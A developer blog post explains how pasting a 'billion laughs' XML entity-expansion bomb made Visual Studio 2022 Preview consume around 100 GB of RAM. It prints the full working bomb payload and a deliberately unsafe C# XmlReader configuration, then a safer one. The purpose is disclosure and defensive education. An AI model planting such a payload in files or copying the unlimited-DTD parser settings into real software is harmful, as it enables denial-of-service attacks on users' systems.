DEV Community

Sergey Vasiliev

How Visual Studio 2022 ate up 100 GB of memory and what XML bombs had to do with it

In April 2021 Microsoft announced a new version of its IDE – Visual Studio 2022 – while also announcing that the IDE would be 64-bit. We've been waiting for this for so long – no more 4 GB memory limitations! However, as it turned out, it's not all that simple...

0865_VS2022_XMLBomb/image1.png

By the way, if you missed it, here's a link to the announcement post.

But let's get to the matter in question. I reproduced this problem on the latest (available at the time of writing) Visual Studio 2022 version - 17.0.0 Preview 3.1.

To reproduce this, the following is sufficient:

  • use the Blank Solution template to create a new project;
  • add an XML file to the solution.

After this, paste the following text into the XML file:



<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
 <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
 <!ENTITY lol11 
   "&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
 <!ENTITY lol12 
   "&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
 <!ENTITY lol13 
   "&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
 <!ENTITY lol14 
   "&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
 <!ENTITY lol15 
   "&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
]>
<lolz>&lol15;</lolz>



Now go make yourself a cup of coffee, get back to your computer - and watch Visual Studio eat up more and more RAM.

0865_VS2022_XMLBomb/image2.png

You may have two questions:

  1. Why create some weird XML and add it to projects?
  2. What is happening here?

Let's figure this out. To do this, we'll need to understand why processing XML files carelessly can be dangerous and what the PVS-Studio analyzer has to do with all this.

SAST in PVS-Studio

We continue to actively develop PVS-Studio as a SAST solution. For the C# analyzer, the main focus is support for OWASP Top 10 2017 (the latest version available at the time of writing; we are looking forward to an update!). By the way, if you missed it, not too long ago we added the taint analysis feature. You can read about it here.

So, I created (or, to be exact, attempted to create) a sample project to test the analyzer. One of the OWASP Top 10 categories we are developing diagnostic rules for is A4:2017-XML External Entities (XXE). It covers incorrect XML processing that makes applications vulnerable to attacks. What does incorrect processing mean? Often it's excessive trust in input data (a perpetual problem that causes many vulnerabilities) combined with XML parsers that lack sufficient limitations.

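As a result, if the files are compromised, this may cause various unpleasant consequences. There are two main problems here: data disclosure and denial of service. Both have corresponding CWEs:

  • CWE-611: Improper Restriction of XML External Entity Reference;
  • CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion').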

I'll leave CWE-611 for the other day. Today we need CWE-776.

XML bombs (billion laughs attack)

I'll briefly describe the essence of the problem. If you want to know more, many resources on the internet will provide you with the information you need.

The XML standard allows the use of a DTD (document type definition). A DTD enables you to declare so-called XML entities.

The entity syntax is simple:



<!ENTITY myEntity "Entity value">



Then you can get the entity value as follows:



&myEntity;



The catch here is, entities can expand not only into strings (as in our case - "Entity value"), but also into sequences of other entities. For example:



<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">



As a result, when expanding the 'lol1' entity, we get a string that looks like this:



lollollollollollollollollollol



You can go further and define the 'lol2' entity by expanding it through 'lol1':



<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">



Then when expanding the 'lol2' entity, you get the following output:



lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollol



How about going a level deeper and defining the 'lol3' entity?



<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">



Here's the output you get when expanding it:



lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
....



The XML file from the beginning of the article is built on the same principle. Now, I think you see where the "billion laughs" name comes from. So if the XML parser is configured incorrectly (DTD processing is enabled and the maximum size of expanded entities is not limited), nothing good happens when this 'bomb' is processed.
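To get a feel for the scale, here is a rough back-of-the-envelope estimate. Write |lol_n| for the number of characters in the fully expanded 'lol_n' entity, with 'lol_0' standing for the plain 'lol' entity. The byte figure assumes the expanded text is held as UTF-16 (2 bytes per character); that is an assumption made for illustration, not something measured inside Visual Studio.

```latex
\begin{aligned}
|\mathrm{lol}_0| &= 3 \\
|\mathrm{lol}_n| &= 10 \cdot |\mathrm{lol}_{n-1}| = 3 \cdot 10^{n} \\
|\mathrm{lol}_{15}| &= 3 \cdot 10^{15}\ \text{characters} \\
3 \cdot 10^{15}\ \text{characters} \times 2\ \text{bytes} &= 6 \cdot 10^{15}\ \text{bytes} \approx 6\ \text{PB}
\end{aligned}
```

The classic billion laughs document stops at 'lol9', which already contains 10^9 copies of "lol". The file above goes six levels deeper, so no realistic amount of RAM would be enough to hold the full expansion.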

In C#, vulnerable code is easiest to demonstrate with the XmlReader type:



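using System;
using System.IO;
using System.Xml;

var pathToXmlBomb = @"D:\XMLBomb.xml";
XmlReaderSettings rs = new XmlReaderSettings()
{
  // Deliberately unsafe: DTD processing is enabled...
  DtdProcessing = DtdProcessing.Parse,
  // ...and 0 removes the limit on characters produced by entity expansion.
  MaxCharactersFromEntities = 0
};

using var stream = File.OpenRead(pathToXmlBomb);
using var reader = XmlReader.Create(stream, rs);
while (reader.Read())
{
  // Reading a text node forces the parser to expand its entities.
  if (reader.NodeType == XmlNodeType.Text)
    Console.WriteLine(reader.Value);
}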



If I configure my XmlReader this way, I am practically telling an attacker: "Come on, blow this up!".

There are two reasons for this:

  • DTD processing is enabled;
  • the limit on the maximum number of characters from entities has been removed, so the expanded content can grow unhindered.

By default, processing of DTD entities is forbidden: the DtdProcessing property is set to Prohibit. The maximum number of characters from entities is also limited (starting with .NET Framework 4.5.2). So in modern .NET you have fewer and fewer opportunities to shoot yourself in the foot. It is still possible though, if you configure parsers incorrectly.
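For contrast, here is a minimal sketch of a more defensive configuration. It is one possible setup, not the only correct one. The path and the 1024-character cap are illustrative values chosen for this example, so pick a limit that fits your own data. If your input never needs entities, leaving DtdProcessing at Prohibit is the stricter option.

```csharp
using System;
using System.IO;
using System.Xml;

// Hypothetical path, mirroring the vulnerable example above.
var pathToXml = @"D:\XMLBomb.xml";

var settings = new XmlReaderSettings
{
  // DTDs are still parsed here, so ordinary entities keep working.
  DtdProcessing = DtdProcessing.Parse,
  // Illustrative cap: give up once entities expand past 1024 characters.
  MaxCharactersFromEntities = 1024
};

try
{
  using var stream = File.OpenRead(pathToXml);
  using var reader = XmlReader.Create(stream, settings);
  while (reader.Read())
  {
    if (reader.NodeType == XmlNodeType.Text)
      Console.WriteLine(reader.Value);
  }
}
catch (XmlException ex)
{
  // The reader throws once the entity expansion limit is exceeded.
  Console.WriteLine($"XML rejected: {ex.Message}");
}
```

With settings like these, the bomb from the beginning of the article should fail fast with an XmlException instead of consuming memory.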

Coming back to Visual Studio 2022

It seems that in Visual Studio 2022, when we pasted our XML bomb, both conditions were true:

  • DTD processing started;
  • no limitations were set - which caused the ever-increasing memory consumption.

We examined the process to see what was happening. What we found confirmed our expectations.

0865_VS2022_XMLBomb/image3.png

The process list showed that the main thread was busy with the XML file. That caused the GUI to freeze, and the IDE did not respond to any attempts to revive it.

The VS Main thread's call stack showed that the thread was busy processing the DTD (executing the ParseDtd method).

0865_VS2022_XMLBomb/image4.png

During the experiment I was wondering, why does Visual Studio run DTD processing at all? Why doesn't it display XML as-is? I got my answer when experimenting with a small XML bomb (same approach, lighter load).

It seems that the whole point is to display possible values of entities in the editor "on the fly".

0865_VS2022_XMLBomb/image5.png

Small values are processed successfully, but problems arise when XML entities start growing.

Of course, after my investigation, I had to write a bug report.

Conclusion

This is how we - unexpectedly - saw an XML bomb in action. It was very interesting to explore a real-life popular application and find something like this.

Just as I am writing this, we are developing a diagnostic to search for code that is vulnerable to XML file processing problems. We expect to release it with PVS-Studio 7.15. If you want to see what the analyzer can do right now, I encourage you to download it and try it on your project. ;)

As always, subscribe to my Twitter so as not to miss anything interesting.

Top comments (7)

Diky Hadna 💡

Q: How much memory do you have?
A: Yes.

Abhinav Kulshreshtha

No, seriously, how much memory does the author have? And to think I was feeling proud after upgrading my 8-year-old laptop from 8 GB of RAM to 16 GB.

Diky Hadna 💡

Hi @vasilievserg let us sleep peacefully tonight :))) How much memory do you have?

Sergey Vasiliev

Hi @dkhd , @abhinav1217
The machine, on which we performed the experiments, has 128 GB RAM. :)

Lior Banai

Thanks for sharing. Now I need to go and check my Analogy Log Viewer on GitHub, which has an XML log parser 🙂

Rolando Medina

And I thought I could complain on 16GB RAM and 4GB RAM usage from VS2022. Can't be safe even with 128GB!!!

Bruno Ochotorena

It's the infamous LOL bomb.